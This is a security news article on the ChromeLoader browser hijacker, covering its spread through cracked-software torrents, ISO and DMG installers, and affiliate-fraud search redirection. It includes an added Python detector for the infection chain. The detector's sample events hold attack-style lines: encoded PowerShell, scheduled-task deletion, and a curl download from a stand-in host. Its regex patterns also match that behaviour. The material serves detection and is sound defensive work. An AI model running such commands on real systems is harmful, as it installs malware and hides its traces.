This nasty browser hijacker malware becomes a serious threat

The distribution of ChromeLoader malware has increased in recent months, turning it from a relative nuisance into a threat in its own right.

Red Canary researchers have been tracking the malware for the past five months and say the threat has increased significantly.

According to the research, the attackers target both Windows and macOS users, distributing the malware via torrent files posing as software and game cracks.

They also use social networking sites, such as Twitter, to promote torrent links, sharing QR codes that lead to sites that host malware.

ChromeLoader malware

The goal is for victims to download the files themselves. On Windows, the payload comes as an .ISO file which, when mounted as a virtual CD-ROM drive, presents an executable disguised as a crack or keygen. The researchers say the file is most often named "CS_Installer.exe".

Once the victim runs the file, it decodes and executes a PowerShell command that retrieves a file from a remote server and loads it as a Google Chrome browser extension. PowerShell then removes the scheduled task, leaving no trace of its presence.

The methodology for macOS is somewhat different: instead of an ISO, the attackers use DMG files, which are more common on that platform, and the installer executable is replaced with a bash installer script that downloads and unpacks the extension into "private/var/tmp".
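As an added illustration (not code from the article or from Red Canary), the following detector walks constructed process-creation events and flags the two chains described above: on Windows, encoded PowerShell spawned by an executable at the root of a non-system drive (a heuristic for a mounted ISO) and a later schtasks deletion under that PowerShell; on macOS, a shell script run from a mounted DMG under /Volumes whose child writes into /private/var/tmp. The encoded-command switch, the drive-root heuristic, the task name and the download tool are assumptions, not details from the report.

```python
import re

# Constructed process-creation events standing in for an EDR export (not data from the
# article). Fields: host, pid, ppid, image (binary path), cmdline. Payloads are placeholders.
EVENTS = [
    {"host": "win-01", "pid": 400, "ppid": 10, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"host": "win-01", "pid": 412, "ppid": 400, "image": r"E:\CS_Installer.exe", "cmdline": "CS_Installer.exe"},
    {"host": "win-01", "pid": 420, "ppid": 412, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -WindowStyle Hidden -EncodedCommand <BASE64-PLACEHOLDER>"},
    {"host": "win-01", "pid": 431, "ppid": 420, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": 'schtasks.exe /delete /tn "UpdaterTask" /f'},  # assumed task name
    # Benign contrast: encoded PowerShell from an interactive console, no mounted image, no task deletion.
    {"host": "win-02", "pid": 500, "ppid": 10, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe"},
    {"host": "win-02", "pid": 505, "ppid": 500, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -EncodedCommand <BASE64-PLACEHOLDER>"},
    {"host": "mac-01", "pid": 700, "ppid": 1, "image": "/bin/bash", "cmdline": "/bin/bash /Volumes/Installer/install.sh"},
    {"host": "mac-01", "pid": 705, "ppid": 700, "image": "/usr/bin/curl",
     "cmdline": "curl -o /private/var/tmp/ext.zip https://download.example/ext.zip"},  # assumed downloader
]

# Heuristics (assumptions): a mounted ISO shows up as a new drive letter with the decoy at its root;
# a mounted DMG appears under /Volumes; PowerShell accepts -e/-ec/-enc as prefixes of -EncodedCommand.
ROOT_OF_NON_SYSTEM_DRIVE = re.compile(r"^[D-Z]:\\[^\\]+\.exe$", re.I)
ENCODED_PS = re.compile(r"powershell(\.exe)?\b.*\s-(e|ec|enc|encodedcommand)\b", re.I)
SCHTASKS_DELETE = re.compile(r"schtasks(\.exe)?\b.*\s/delete\b", re.I)
MOUNTED_DMG_SCRIPT = re.compile(r"^/bin/(ba)?sh\s+/Volumes/", re.I)
MAC_TMP_DROP = re.compile(r"/private/var/tmp/", re.I)


def ancestors(index, ev):
    """Yield parent, grandparent, ... of ev on the same host (cycle-safe)."""
    seen = set()
    cur = index.get((ev["host"], ev["ppid"]))
    while cur and cur["pid"] not in seen:
        yield cur
        seen.add(cur["pid"])
        cur = index.get((cur["host"], cur["ppid"]))


def detect(events):
    """Return (host, pid, rule) for every event that completes a ChromeLoader-like chain."""
    index = {(e["host"], e["pid"]): e for e in events}
    hits = []
    for ev in events:
        anc = list(ancestors(index, ev))
        if ENCODED_PS.search(ev["cmdline"]) and any(ROOT_OF_NON_SYSTEM_DRIVE.match(a["image"]) for a in anc):
            hits.append((ev["host"], ev["pid"], "encoded_powershell_from_mounted_image"))
        if SCHTASKS_DELETE.search(ev["cmdline"]) and any(ENCODED_PS.search(a["cmdline"]) for a in anc):
            hits.append((ev["host"], ev["pid"], "schtasks_delete_by_encoded_powershell"))
        if MAC_TMP_DROP.search(ev["cmdline"]) and any(MOUNTED_DMG_SCRIPT.match(a["cmdline"]) for a in anc):
            hits.append((ev["host"], ev["pid"], "dmg_script_writes_private_var_tmp"))
    return hits


if __name__ == "__main__":
    for host, pid, rule in detect(EVENTS):
        print(f"{host} pid={pid} {rule}")
```

Each rule requires the parent chain, so the lone encoded PowerShell on win-02 is not flagged; in production the same logic would run over real process-tree telemetry rather than the embedded sample.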

ChromeLoader is described as a browser hijacker that can modify browser settings on the target endpoint, allowing it to display modified search results. By displaying fake giveaways, dating sites, or unwanted third-party software, the threat actors earn commissions from affiliate programs.

What sets ChromeLoader apart in a sea of similar browser hijackers is its persistence, volume, and infection path, the researchers said.